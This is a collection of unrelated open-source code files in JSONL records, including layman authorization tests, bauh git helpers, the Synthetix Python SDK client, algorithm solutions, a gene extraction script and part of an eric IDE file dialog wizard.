организации'\n","repo_name":"icw82/django-kk","sub_path":"kk/entities/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2963253837","text":"import requests\nfrom flask import g\nimport pytest\n\nfrom layman import app, settings, LaymanError\nfrom test_tools import process_client\nfrom test_tools.util import url_for\nfrom . import authorize_workspace_publications_decorator\n\n\n@authorize_workspace_publications_decorator\ndef mock_method():\n pass\n\n\n@pytest.mark.parametrize('request_path', [\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/layers',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/layers/abc',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/username/abc',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/username/publications',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/username/publications/blablabla',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/username/publications/blablabla/da',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/users/layers',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/users/maps/map',\n f'/rest/layers',\n f'/rest/layers/abc',\n f'/rest/username/abc',\n f'/rest/username/publications',\n f'/rest/username/publications/blablabla',\n f'/rest/username/publications/blablabla/da',\n f'/rest/users/layers',\n f'/rest/users/maps/map',\n])\ndef test_authorize_publications_decorator_does_not_accept_path(request_path):\n with app.test_request_context(request_path):\n with pytest.raises(Exception) as exc_info:\n mock_method()\n assert str(exc_info.value) == f\"Authorization module is unable to authorize path {request_path}\", exc_info.traceback\n\n\n@pytest.mark.parametrize('request_path', [\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/layers',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/layers/',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/maps/',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/layers/abc',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/layers/some_layer/some/nested/endpoint',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/maps/a_map',\n f'/rest/user_a/layers',\n f'/rest/user_a/layers/',\n f'/rest/user_a/maps/',\n f'/rest/user_a/layers/abc',\n f'/rest/user_a/layers/some_layer/some/nested/endpoint',\n f'/rest/user_a/maps/a_map',\n])\ndef test_authorize_publications_decorator_accepts_path(request_path):\n with app.test_request_context(request_path):\n # pylint: disable=assigning-non-slot\n g.user = None\n with pytest.raises(Exception) as exc_info:\n mock_method()\n assert isinstance(exc_info.value, LaymanError), exc_info.traceback\n\n\nclass TestRestApiClass:\n layername = 'test_authorize_decorator_layer'\n mapname = 'test_authorize_decorator_map'\n username = 'test_authorize_decorator_user'\n authz_headers = process_client.get_authz_headers(username)\n\n @pytest.fixture(scope=\"class\")\n def provide_publications(self):\n username = self.username\n authz_headers = self.authz_headers\n layername = self.layername\n mapname = self.mapname\n process_client.ensure_reserved_username(username, headers=authz_headers)\n process_client.publish_workspace_layer(username, layername, headers=authz_headers)\n process_client.publish_workspace_map(username, mapname, headers=authz_headers)\n yield\n process_client.delete_workspace_layer(username, layername, headers=authz_headers)\n process_client.delete_workspace_map(username, mapname, headers=authz_headers)\n\n @staticmethod\n def assert_response(response, exp_status_code, exp_data):\n assert response.status_code == exp_status_code, response.text\n if exp_status_code == 200 and exp_data is not None:\n resp_json = response.json()\n if callable(exp_data):\n assert exp_data(resp_json), f\"resp_json={resp_json}, exp_data={exp_data}\"\n else:\n assert resp_json == exp_data\n elif exp_status_code != 200 and exp_data is not None:\n resp_json = response.json()\n assert resp_json['code'] == exp_data, f\"resp_json={resp_json}, exp_data={exp_data}\"\n\n @staticmethod\n def has_single_layer(r_json):\n return {li['name'] for li in r_json} == {TestRestApiClass.layername}\n\n @staticmethod\n def has_single_map(r_json):\n return {li['name'] for li in r_json} == {TestRestApiClass.mapname}\n\n @staticmethod\n def has_no_publication(r_json):\n return {li['name'] for li in r_json} == set()\n\n @pytest.mark.parametrize(\n \"rest_action, url_for_params, authz_status_code, authz_response, unauthz_status_code, unauthz_response\",\n [\n ('rest_workspace_layers.get', {}, 200, has_single_layer.__func__, 200, has_no_publication.__func__),\n ('rest_workspace_layer.get', {'layername': layername}, 200, None, 404, 15),\n ('rest_workspace_layer_metadata_comparison.get', {'layername': layername}, 200, None, 404, 15),\n ('rest_workspace_layer_style.get', {'layername': layername}, 200, None, 404, 15),\n ('rest_workspace_layer_thumbnail.get', {'layername': layername}, 200, None, 404, 15),\n ('rest_workspace_layer_chunk.get', {'layername': layername}, 400, 20, 404, 15),\n ('rest_workspace_maps.get', {}, 200, has_single_map.__func__, 200, has_no_publication.__func__),\n ('rest_workspace_map.get', {'mapname': mapname}, 200, None, 404, 26),\n ('rest_workspace_map_file.get', {'mapname': mapname}, 200, None, 404, 26),\n ('rest_workspace_map_metadata_comparison.get', {'mapname': mapname}, 200, None, 404, 26),\n ('rest_workspace_map_thumbnail.get', {'mapname': mapname}, 200, None, 404, 26),\n ],\n )\n @pytest.mark.usefixtures('oauth2_provider_mock', 'ensure_layman', 'provide_publications')\n def test_authorize_publications_decorator_on_rest_api(\n self,\n rest_action,\n url_for_params,\n authz_status_code,\n authz_response,\n unauthz_status_code,\n unauthz_response,\n ):\n username = self.username\n authz_headers = self.authz_headers\n patch_method = None\n publ_name = None\n if '_layer' in rest_action:\n patch_method = process_client.patch_workspace_layer\n publ_name = self.layername\n elif '_map' in rest_action:\n patch_method = process_client.patch_workspace_map\n publ_name = self.mapname\n assert publ_name\n\n url_for_params['workspace'] = username\n\n with app.app_context():\n rest_url = url_for(rest_action, **url_for_params)\n\n patch_method(username, publ_name, headers=authz_headers, access_rights={\n 'read': username,\n 'write': username,\n })\n response = requests.get(rest_url, headers=authz_headers, timeout=settings.DEFAULT_CONNECTION_TIMEOUT)\n self.assert_response(response, authz_status_code, authz_response)\n response = requests.get(rest_url, timeout=settings.DEFAULT_CONNECTION_TIMEOUT)\n self.assert_response(response, unauthz_status_code, unauthz_response)\n\n patch_method(username, publ_name, headers=authz_headers, access_rights={\n 'read': settings.RIGHTS_EVERYONE_ROLE,\n 'write': settings.RIGHTS_EVERYONE_ROLE,\n })\n response = requests.get(rest_url, headers=authz_headers, timeout=settings.DEFAULT_CONNECTION_TIMEOUT)\n self.assert_response(response, authz_status_code, authz_response)\n response = requests.get(rest_url, timeout=settings.DEFAULT_CONNECTION_TIMEOUT)\n self.assert_response(response, authz_status_code, authz_response)\n","repo_name":"LayerManager/layman","sub_path":"src/layman/authz/authz_test.py","file_name":"authz_test.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"44"} +{"seq_id":"25011965356","text":"import shutil\nfrom io import StringIO\nfrom logging import Logger\nfrom typing import List, Tuple, Optional\n\nfrom bauh.commons import system\nfrom bauh.commons.system import SimpleProcess\n\n\ndef is_installed() -> bool:\n return bool(shutil.which('git'))\n\n\ndef list_commits(proj_dir: str, limit: int = -1, logger: Optional[Logger] = None) -> Optional[List[Tuple[str, int]]]:\n if limit == 0:\n return\n\n cmd = StringIO()\n cmd.write('git log --format=\"%H %ct\"')\n\n if limit > 0:\n cmd.write(f' -{limit}')\n\n code, output = system.execute(cmd.getvalue(), cwd=proj_dir, shell=True)\n\n if code == 0 and output:\n commits = []\n for line in output.split('\\n'):\n line_strip = line.strip()\n\n if line_strip:\n line_split = line_strip.split(' ', 1)\n\n if len(line_split) == 2:\n commit_sha = line_split[0].strip()\n try:\n commit_date = int(line_split[1].strip())\n except ValueError:\n commit_date = None\n\n if logger:\n logger.error(f\"Could not parse commit date {line_split[1]}\")\n\n commits.append((commit_sha, commit_date))\n\n return commits\n\n\ndef clone(url: str, target_dir: Optional[str], depth: int = -1, custom_user: Optional[str] = None) -> SimpleProcess:\n cmd = ['git', 'clone', url]\n\n if depth > 0:\n cmd.append(f'--depth={depth}')\n\n if target_dir:\n cmd.append(target_dir)\n\n return SimpleProcess(cmd=cmd, custom_user=custom_user)\n","repo_name":"vinifmor/bauh","sub_path":"bauh/gems/arch/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":799,"dataset":"github-code","pt":"44"} +{"seq_id":"12598621415","text":"import asyncio\nimport time\nimport logging\nimport warnings\nimport web3\nfrom web3 import Web3\nfrom web3.constants import ADDRESS_ZERO\nfrom web3.types import TxParams\nfrom .constants import (\n DEFAULT_NETWORK_ID,\n DEFAULT_TRACKING_CODE,\n DEFAULT_SLIPPAGE,\n DEFAULT_GQL_ENDPOINT_PERPS,\n DEFAULT_GQL_ENDPOINT_RATES,\n DEFAULT_PRICE_SERVICE_ENDPOINTS,\n DEFAULT_REFERRER,\n DEFAULT_TRACKING_CODE,\n)\nfrom .utils import wei_to_ether, ether_to_wei\nfrom .contracts import load_contracts\nfrom .pyth import Pyth\nfrom .core import Core\nfrom .perps import Perps\nfrom .spot import Spot\n\n# from .alerts import Alerts\nfrom .queries import Queries\n\nwarnings.filterwarnings(\"ignore\")\n\n\nclass Synthetix:\n \"\"\"\n The main class for interacting with the Synthetix protocol. The class\n requires a provider RPC endpoint and a wallet address::\n\n snx = Synthetix(\n provider_rpc='https://base-mainnet.infura.io/v3/...',\n network_id=8453,\n address='0x12345...'\n )\n\n The class can be initialized with a private key to allow for transactions\n to be signed and sent to your RPC::\n\n snx = Synthetix(\n provider_rpc='https://base-mainnet.infura.io/v3/...',\n network_id=8453,\n address='0x12345...',\n private_key='0xabcde...'\n )\n\n :param str provider_rpc: An RPC endpoint to use for the provider that interacts\n with the smart contracts. This must match the ``network_id``.\n :param str mainnet_rpc: A mainnet RPC endpoint to use for the provider that\n fetches deployments from the Cannon registry.\n :param str ipfs_gateway: An IPFS gateway to use for fetching deployments from Cannon.\n :param str address: Wallet address to use as a default. If a private key is\n specified, this address will be used to sign transactions.\n :param str private_key: Private key of the provided wallet address. If specified,\n the wallet will be enabled to sign and submit transactions.\n :param int network_id: Network ID for the chain to connect to. This must match\n the chain ID of the RPC endpoint.\n :param int core_account_id: A default ``account_id`` for core transactions.\n Setting a default will avoid the need to specify on each transaction. If\n not specified, the first ``account_id`` will be used.\n :param int perps_account_id: A default ``account_id`` for perps transactions.\n Setting a default will avoid the need to specify on each transaction. If\n not specified, the first ``account_id`` will be used.\n :param str tracking_code: Set a tracking code for trades.\n :param str referrer: Set a referrer address for trades.\n :param float max_price_impact: Max price impact setting for trades,\n specified as a percentage. This setting applies to both spot and\n perps markets.\n :param bool use_estimate_gas: Use estimate gas for transactions. If false,\n it is assumed you will add a gas limit to all transactions.\n :param str gql_endpoint_perps: GraphQL endpoint for perps data.\n :param str satsuma_api_key: API key for Satsuma. If the endpoint is from\n Satsuma, the API key will be automatically added to the request.\n :param str price_service_endpoint: Endpoint for a Pyth price service. If\n not specified, a default endpoint is used.\n :return: Synthetix class instance\n :rtype: Synthetix\n \"\"\"\n\n def __init__(\n self,\n provider_rpc: str,\n mainnet_rpc: str = \"https://eth.llamarpc.com\",\n ipfs_gateway: str = \"https://ipfs.io/ipfs\",\n address: str = ADDRESS_ZERO,\n private_key: str = None,\n network_id: int = None,\n core_account_id: int = None,\n perps_account_id: int = None,\n tracking_code: str = None,\n referrer: str = None,\n max_price_impact: float = DEFAULT_SLIPPAGE,\n use_estimate_gas: bool = True,\n cannon_config: dict = None,\n gql_endpoint_perps: str = None,\n gql_endpoint_rates: str = None,\n satsuma_api_key: str = None,\n price_service_endpoint: str = None,\n telegram_token: str = None,\n telegram_channel_name: str = None,\n ):\n # set up logging\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.setLevel(logging.INFO)\n\n handler = logging.StreamHandler()\n handler.setFormatter(\n logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n )\n self.logger.addHandler(handler)\n\n # set default values\n if network_id is None:\n network_id = DEFAULT_NETWORK_ID\n else:\n network_id = int(network_id)\n\n if tracking_code:\n self.tracking_code = tracking_code\n else:\n self.tracking_code = DEFAULT_TRACKING_CODE\n\n if referrer:\n self.referrer = referrer\n else:\n self.referrer = DEFAULT_REFERRER\n\n if max_price_impact:\n self.max_price_impact = max_price_impact\n else:\n self.max_price_impact = DEFAULT_SLIPPAGE\n\n # init account variables\n self.private_key = private_key\n self.address = address\n self.use_estimate_gas = use_estimate_gas\n self.cannon_config = cannon_config\n self.provider_rpc = provider_rpc\n self.mainnet_rpc = mainnet_rpc\n self.ipfs_gateway = ipfs_gateway\n\n # init chain provider\n if provider_rpc.startswith(\"http\"):\n web3 = Web3(Web3.HTTPProvider(self.provider_rpc))\n elif provider_rpc.startswith(\"wss\"):\n web3 = Web3(Web3.WebsocketProvider(self.provider_rpc))\n else:\n raise Exception(\"Provider RPC endpoint is invalid\")\n\n # check if the chain_id matches\n if web3.eth.chain_id != network_id:\n raise Exception(\"The RPC `chain_id` must match the stored `network_id`\")\n else:\n self.nonce = web3.eth.get_transaction_count(self.address)\n\n self.web3 = web3\n self.network_id = network_id\n\n # init contracts\n self.contracts = load_contracts(self)\n (\n self.v2_markets,\n self.susd_legacy_token,\n self.susd_token,\n self.multicall,\n ) = self._load_contracts()\n\n # init alerts\n # if telegram_token and telegram_channel_name:\n # self.alerts = Alerts(telegram_token, telegram_channel_name)\n\n # init queries\n if not gql_endpoint_perps and self.network_id in DEFAULT_GQL_ENDPOINT_PERPS:\n gql_endpoint_perps = DEFAULT_GQL_ENDPOINT_PERPS[self.network_id]\n\n if not gql_endpoint_rates and self.network_id in DEFAULT_GQL_ENDPOINT_RATES:\n gql_endpoint_rates = DEFAULT_GQL_ENDPOINT_RATES[self.network_id]\n\n self.queries = Queries(\n synthetix=self,\n gql_endpoint_perps=gql_endpoint_perps,\n gql_endpoint_rates=gql_endpoint_rates,\n api_key=satsuma_api_key,\n )\n\n # init pyth\n if (\n not price_service_endpoint\n and self.network_id in DEFAULT_PRICE_SERVICE_ENDPOINTS\n ):\n price_service_endpoint = DEFAULT_PRICE_SERVICE_ENDPOINTS[self.network_id]\n\n self.pyth = Pyth(self, price_service_endpoint=price_service_endpoint)\n self.core = Core(self, core_account_id)\n self.perps = Perps(self, self.pyth, perps_account_id)\n self.spot = Spot(self, self.pyth)\n\n def _load_contracts(self):\n \"\"\"\n Initializes and sets up contracts according to the connected chain.\n On calling this function, the following contracts are connected and set up:\n * ``PerpsV2MarketData``\n * ``PerpsV2MarketProxy`` (for each V2 market)\n * ``sUSD`` contracts for both V3 and legacy sUSD.\n * ``TrustedMulticallForwarder`` (if available)\n\n These are stored as methods on the base Synthetix object::\n\n >>> snx.susd_token.address\n 0x...\n\n :return: web3 contracts\n :rtype: [contract, contract, contract, contract]\n \"\"\"\n w3 = self.web3\n\n if \"PerpsV2MarketData\" in self.contracts:\n data_definition = self.contracts[\"PerpsV2MarketData\"]\n data_address = w3.to_checksum_address(data_definition[\"address\"])\n data_abi = data_definition[\"abi\"]\n\n marketdata_contract = w3.eth.contract(data_address, abi=data_abi)\n\n try:\n allmarketsdata = (\n marketdata_contract.functions.allProxiedMarketSummaries().call()\n )\n except Exception as e:\n allmarketsdata = []\n\n markets = {\n market[2]\n .decode(\"utf-8\")\n .strip(\"\\x00\")[1:-4]: {\n \"market_address\": market[0],\n \"asset\": market[1].decode(\"utf-8\").strip(\"\\x00\"),\n \"key\": market[2],\n \"maxLeverage\": w3.from_wei(market[3], \"ether\"),\n \"price\": market[4],\n \"marketSize\": market[5],\n \"marketSkew\": market[6],\n \"marketDebt\": market[7],\n \"currentFundingRate\": market[8],\n \"currentFundingVelocity\": market[9],\n \"takerFee\": market[10][0],\n \"makerFee\": market[10][1],\n \"takerFeeDelayedOrder\": market[10][2],\n \"makerFeeDelayedOrder\": market[10][3],\n \"takerFeeOffchainDelayedOrder\": market[10][4],\n \"makerFeeOffchainDelayedOrder\": market[10][5],\n }\n for market in allmarketsdata\n }\n else:\n markets = {}\n\n # load sUSD legacy contract\n if \"sUSD\" in self.contracts:\n susd_legacy_definition = self.contracts[\"sUSD\"]\n susd_legacy_address = w3.to_checksum_address(\n susd_legacy_definition[\"address\"]\n )\n\n susd_legacy_token = w3.eth.contract(\n susd_legacy_address, abi=susd_legacy_definition[\"abi\"]\n )\n else:\n susd_legacy_token = None\n\n # load sUSD contract\n if \"USDProxy\" in self.contracts:\n susd_definition = self.contracts[\"USDProxy\"]\n susd_address = w3.to_checksum_address(susd_definition[\"address\"])\n\n susd_token = w3.eth.contract(susd_address, abi=susd_definition[\"abi\"])\n else:\n susd_token = None\n\n # load multicall contract\n if \"TrustedMulticallForwarder\" in self.contracts:\n mc_definition = self.contracts[\"TrustedMulticallForwarder\"]\n mc_address = w3.to_checksum_address(mc_definition[\"address\"])\n\n multicall = w3.eth.contract(mc_address, abi=mc_definition[\"abi\"])\n else:\n multicall = None\n\n return markets, susd_legacy_token, susd_token, multicall\n\n def _get_tx_params(self, value=0, to=None) -> TxParams:\n \"\"\"\n A helper function to prepare transaction parameters. This function\n will set up the transaction based on the parameters at initialization,\n but leave the ``data`` parameter empty.\n\n :param int value: value to send with transaction\n :param str | None to: address to send transaction to\n :return: A prepared transaction without the ``data`` parameter\n :rtype: TxParams\n \"\"\"\n params: TxParams = {\n \"from\": self.address,\n \"chainId\": self.network_id,\n \"value\": value,\n \"nonce\": self.nonce,\n }\n if to is not None:\n params[\"to\"] = to\n return params\n\n def wait(self, tx_hash: str, timeout: int = 120):\n \"\"\"\n Wait for a transaction to be confirmed and return the receipt.\n The function will throw an error if the timeout is exceeded.\n Use this as a helper function to wait for a transaction to be confirmed,\n then check the results and react accordingly.\n\n :param str tx_hash: transaction hash to wait for\n :param int timeout: timeout in seconds\n :return: A transaction receipt\n :rtype: dict\n \"\"\"\n receipt = self.web3.eth.wait_for_transaction_receipt(tx_hash, timeout=timeout)\n return receipt\n\n def execute_transaction(self, tx_data: dict):\n \"\"\"\n Execute a provided transaction. This function will be signed with the provided\n private key and submitted to the connected RPC. The ``Synthetix`` object tracks\n the nonce internally, and will handle estimating gas limits if they are not\n provided.\n\n :param dict tx_data: transaction data\n :return: A transaction hash\n :rtype: str\n \"\"\"\n if self.private_key is None:\n raise Exception(\"No private key specified.\")\n\n if \"gas\" not in tx_data:\n if self.use_estimate_gas:\n tx_data[\"gas\"] = int(self.web3.eth.estimate_gas(tx_data) * 1.2)\n else:\n tx_data[\"gas\"] = 1500000\n\n signed_txn = self.web3.eth.account.sign_transaction(\n tx_data, private_key=self.private_key\n )\n tx_token = self.web3.eth.send_raw_transaction(signed_txn.rawTransaction)\n\n # increase nonce\n self.nonce += 1\n\n return self.web3.to_hex(tx_token)\n\n def get_susd_balance(self, address: str = None, legacy: bool = False) -> dict:\n \"\"\"\n Gets current sUSD balance in wallet. Supports both legacy and V3 sUSD.\n\n :param str address: address to check balances for\n :param bool legacy: check legacy sUSD balance\n :return: A dictionary with the sUSD balance\n :rtype: dict\n \"\"\"\n # TODO: remove the dictionary return\n if not address:\n address = self.address\n\n token = self.susd_legacy_token if legacy else self.susd_token\n if token is None:\n return {\"balance\": 0}\n\n balance = token.functions.balanceOf(self.address).call()\n return {\"balance\": wei_to_ether(balance)}\n\n def get_eth_balance(self, address: str = None) -> dict:\n \"\"\"\n Gets current ETH and WETH balances at the specified address.\n\n :param str address: address to check balances for\n :return: A dictionary with the ETH and WETH balances\n :rtype: dict\n \"\"\"\n if not address:\n address = self.address\n\n weth_contract = self.web3.eth.contract(\n address=self.contracts[\"WETH\"][\"address\"], abi=self.contracts[\"WETH\"][\"abi\"]\n )\n\n eth_balance = self.web3.eth.get_balance(address)\n weth_balance = weth_contract.functions.balanceOf(address).call()\n\n return {\"eth\": wei_to_ether(eth_balance), \"weth\": wei_to_ether(weth_balance)}\n\n # transactions\n def approve(\n self,\n token_address: str,\n target_address: str,\n amount: float = None,\n submit: bool = False,\n ):\n \"\"\"\n Approve an address to spend a specified ERC20 token. This is a general\n implementation that can be used for any ERC20 token. Specify the amount\n as an ether value, otherwise it will default to the maximum amount::\n\n snx.approve(\n snx.susd_token.address,\n snx.perps.market_proxy.address,\n amount=1000\n )\n\n :param str token_address: address of the token to approve\n :param str target_address: address to approve to spend the token\n :param float amount: amount of the token to approve\n :param bool submit: submit the transaction\n :return: If ``submit``, returns a transaction hash. Otherwise, returns\n the transaction parameters.\n :rtype: str | dict\n \"\"\"\n # fix the amount\n amount = 2**256 - 1 if amount is None else ether_to_wei(amount)\n token_contract = self.web3.eth.contract(\n address=token_address, abi=self.contracts[\"USDProxy\"][\"abi\"]\n )\n\n tx_params = self._get_tx_params()\n tx_params = token_contract.functions.approve(\n target_address, amount\n ).build_transaction(tx_params)\n\n if submit:\n tx_hash = self.execute_transaction(tx_params)\n self.logger.info(\n f\"Approving {target_address} to spend {amount / 1e18} {token_address} for {self.address}\"\n )\n self.logger.info(f\"approve tx: {tx_hash}\")\n return tx_hash\n else:\n return tx_params\n\n def allowance(\n self, token_address: str, spender_address: str, owner_address: str = None\n ) -> float:\n \"\"\"\n Get the allowance for a target address to spend a specified ERC20 token for an owner.\n This is a general implementation that can be used for any ERC20 token.::\n\n snx.allowance(\n snx.susd_token.address,\n\n snx.perps.market_proxy.address\n )\n\n :param str token_address: address of the token to approve\n :param str spender_address: address to spender of the token\n :param str owner_address: address to token owner. If not specified, the default\n address is used.\n :return: The allowance for the target address to spend the token for the owner\n :rtype: float\n \"\"\"\n if not owner_address:\n owner_address = self.address\n\n token_contract = self.web3.eth.contract(\n address=token_address, abi=self.contracts[\"USDProxy\"][\"abi\"]\n )\n\n allowance = token_contract.functions.allowance(\n owner_address, spender_address\n ).call()\n\n return wei_to_ether(allowance)\n\n def wrap_eth(self, amount: float, submit: bool = False) -> str:\n \"\"\"\n Wraps or unwaps ETH to/from the WETH implementation stored in the constants file.\n Negative numbers will unwrap ETH, positive numbers will wrap ETH::\n\n snx.wrap_eth(1)\n snx.wrap_eth(-1)\n\n :param float amount: amount of ETH to wrap\n :param bool submit: submit the transaction\n :return: If ``submit``, returns a transaction hash. Otherwise, returns\n the transaction parameters.\n :rtype: str | dict\n \"\"\"\n value_wei = ether_to_wei(max(amount, 0))\n weth_contract = self.web3.eth.contract(\n address=self.contracts[\"WETH\"][\"address\"], abi=self.contracts[\"WETH\"][\"abi\"]\n )\n\n if amount < 0:\n fn_name = \"withdraw\"\n tx_args = [ether_to_wei(abs(amount))]\n else:\n fn_name = \"deposit\"\n tx_args = []\n\n tx_params = self._get_tx_params(value=value_wei)\n tx_params = weth_contract.functions[fn_name](*tx_args).build_transaction(\n tx_params\n )\n\n if submit:\n tx_hash = self.execute_transaction(tx_params)\n self.logger.info(f\"Wrapping {amount} ETH for {self.address}\")\n self.logger.info(f\"wrap_eth tx: {tx_hash}\")\n return tx_hash\n else:\n return tx_params\n","repo_name":"Synthetixio/python-sdk","sub_path":"src/synthetix/synthetix.py","file_name":"synthetix.py","file_ext":"py","file_size_in_byte":19270,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"9477013521","text":"# 딕셔너리로 저장하는 것은 시간초과 발생, 이것도 완전탐색이다.\n# 투 포인터를 활용하여 시간복잡도를 줄인다.\n# python3 로 채점하면 시간초과 발생.\nimport sys\n\nn = int(input())\nA, B, C, D = [0 for _ in range(n)], [0 for _ in range(n)], [0 for _ in range(n)], [0 for _ in range(n)]\n\nfor i in range(n):\n A[i], B[i], C[i], D[i] = map(int, sys.stdin.readline().split())\n\nAB, CD = [], []\nfor i in range(n):\n for j in range(n):\n AB.append(A[i] + B[j])\n CD.append(C[i] + D[j])\nAB.sort()\nCD.sort()\n\n# AB에 left 인덱스를 놓고, CD에 right 인덱스를 놓는다.\nleft, right = 0, len(CD) - 1\nanswer = 0\nwhile left < len(AB) and right >= 0:\n if AB[left] + CD[right] == 0: # 합이 0일 때\n nextL, nextR = left + 1, right - 1 # 같은 값을 찾아\n while nextL < len(AB) and AB[left] == AB[nextL]:\n nextL += 1\n while nextR >= 0 and CD[right] == CD[nextR]:\n nextR -= 1\n answer += (nextL - left) * (right - nextR) # 갯수만큼 결과 값에 더한다.\n left, right = nextL, nextR\n elif AB[left] + CD[right] > 0: # 합이 0보다 클 때\n right -= 1\n else: # 합이 0보다 작을 때\n left += 1\nprint(answer)","repo_name":"Challenge-Next-Level/Floyd-Warshall","sub_path":"gunkim/tony의문제집/TwoPointer/7453_합이0인네정수.py","file_name":"7453_합이0인네정수.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"8349309032","text":"class LongestBinarySubsequence:\n\n def longestSubsequence(self, s, k):\n\n b = 1\n value = 0\n\n n = len(s)\n answer = 0\n\n for i in range(n-1, -1, -1):\n if s[i] == '1':\n if value + b <= k:\n answer += 1\n value += b\n # b *= 2\n else:\n answer += 1\n\n b *= 2\n\n return answer\n\n\nif __name__ == \"__main__\":\n\n lbs = LongestBinarySubsequence()\n\n s = \"001010010\"\n k = 1\n\n print(lbs.longestSubsequence(s, k))\n","repo_name":"srikrishnakaashyap/Coding_Practice","sub_path":"LongestBinarySubsequence.py","file_name":"LongestBinarySubsequence.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12457614393","text":"from Bio import SeqIO, Seq\n\ndef overlap( s1, e1, s2, e2 ):\n\treturn max(0, min(e1, e2) - max(s1, s2) + 1)\n\ndef get_BA71V():\n\tfor rec in SeqIO.parse(open('data/U18466.2.fa'), 'fasta'):\n\t\tgenome = str(rec.seq)\n\n\twith open('data/BA71V_prot.fa', 'w') as f1:\n\t\twith open('data/BA71V_cds.fa', 'w') as f2:\n\t\t\tfor line in open('data/U18466.2.gff3'):\n\t\t\t\ttab = line.split('\\t')\n\t\t\t\tif not 'id' in tab[3]:\n\t\t\t\t\tstart, end, strand, descr = int(tab[1]), int(tab[2]), tab[5], tab[-1].strip()\n\t\t\t\t\tname = tab[3]\n\t\t\t\t\tseq = genome[start-1:end]\n\t\t\t\t\tif strand == '-':\n\t\t\t\t\t\tseq = Seq.reverse_complement(seq)\n\t\t\t\t\tif len(seq)%3!=0 or (seq[-1]!='*' and seq[:3]!='ATG'):\n\t\t\t\t\t\tprint(name, seq)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprot = Seq.translate(seq).strip('*')\n\t\t\t\t\t\tprint('>'+name, prot, sep='\\n', file=f1)\n\t\t\t\t\tprint('>'+name, seq, sep='\\n', file=f2)\n\n\nif __name__ == '__main__':\n\tget_BA71V()","repo_name":"surykartka/circosBlastSimilarities","sub_path":"genome_comparison/get_genes.py","file_name":"get_genes.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32762570982","text":"import os\n\nfrom PyQt5.QtCore import pyqtSlot, QUrl\nfrom PyQt5.QtWidgets import (\n QDialog, QDialogButtonBox, QFileDialog, QButtonGroup\n)\n\nfrom E5Gui.E5Completers import E5FileCompleter, E5DirCompleter\n\nfrom .Ui_FileDialogWizardDialog import Ui_FileDialogWizardDialog\n\nimport Globals\n\n\nclass FileDialogWizardDialog(QDialog, Ui_FileDialogWizardDialog):\n \"\"\"\n Class implementing the color dialog wizard dialog.\n \n It displays a dialog for entering the parameters for the\n E5FileDialog or QFileDialog code generator.\n \"\"\"\n def __init__(self, dialogVariant, parent=None):\n \"\"\"\n Constructor\n \n @param dialogVariant variant of the file dialog to be generated\n (-1 = E5FileDialog, 0 = unknown, 5 = PyQt5)\n @type int\n @param parent parent widget\n @type QWidget\n \"\"\"\n super(FileDialogWizardDialog, self).__init__(parent)\n self.setupUi(self)\n \n self.eStartWithCompleter = E5FileCompleter(self.eStartWith)\n self.eWorkDirCompleter = E5DirCompleter(self.eWorkDir)\n \n self.__typeButtonsGroup = QButtonGroup(self)\n self.__typeButtonsGroup.setExclusive(True)\n self.__typeButtonsGroup.addButton(self.rOpenFile, 1)\n self.__typeButtonsGroup.addButton(self.rOpenFiles, 2)\n self.__typeButtonsGroup.addButton(self.rSaveFile, 3)\n self.__typeButtonsGroup.addButton(self.rfOpenFile, 11)\n self.__typeButtonsGroup.addButton(self.rfOpenFiles, 12)\n self.__typeButtonsGroup.addButton(self.rfSaveFile, 13)\n self.__typeButtonsGroup.addButton(self.rOpenFileUrl, 21)\n self.__typeButtonsGroup.addButton(self.rOpenFileUrls, 22)\n self.__typeButtonsGroup.addButton(self.rSaveFileUrl, 23)\n self.__typeButtonsGroup.addButton(self.rDirectory, 30)\n self.__typeButtonsGroup.addButton(self.rDirectoryUrl, 31)\n self.__typeButtonsGroup.buttonClicked[int].connect(\n self.__toggleInitialFilterAndResult)\n self.__toggleInitialFilterAndResult(1)\n \n self.__dialogVariant = dialogVariant\n if self.__dialogVariant == -1:\n self.pyqtComboBox.addItems([\"eric\"])\n self.setWindowTitle(self.tr(\"E5FileDialog Wizard\"))\n self.pyqtComboBox.setCurrentIndex(0)\n self.pyqtComboBox.setEnabled(False)\n else:\n self.pyqtComboBox.addItems([\"PyQt5\", \"PyQt6\"])\n self.setWindowTitle(self.tr(\"QFileDialog Wizard\"))\n if self.__dialogVariant == 5:\n self.pyqtComboBox.setCurrentIndex(0)\n elif self.__dialogVariant == 6:\n self.pyqtComboBox.setCurrentIndex(1)\n else:\n self.pyqtComboBox.setCurrentIndex(0)\n \n self.rSaveFile.toggled[bool].connect(self.__toggleConfirmCheckBox)\n self.rfSaveFile.toggled[bool].connect(self.__toggleConfirmCheckBox)\n 